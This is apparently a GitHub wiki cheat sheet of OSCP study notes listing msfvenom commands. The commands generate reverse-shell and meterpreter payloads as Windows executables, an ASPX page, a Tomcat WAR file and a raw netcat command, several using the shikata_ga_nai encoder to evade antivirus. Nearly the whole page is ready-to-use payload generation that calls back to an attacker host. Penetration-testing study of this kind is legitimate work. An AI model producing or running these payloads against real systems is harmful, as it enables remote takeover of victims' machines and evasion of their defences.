MSFVenom - A1vinSmith/OSCP-PWK GitHub Wiki
Cheat Sheet
https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/
Take it easy
Samples
msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe -o ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
aspx
msfvenom -p windows/x64/shell_reverse_tcp LHOST="ip" LPORT=4242 -f aspx > shell.aspx
Tomcat WAR
msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war
Output as Raw
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
List payloads
msfvenom --list payloads
msfvenom -l | grep windows
msfvenom --list | grep powershell
Shikata Ga Nai, encoder for x86
https://security.stackexchange.com/questions/130256/what-is-shikata-ga-nai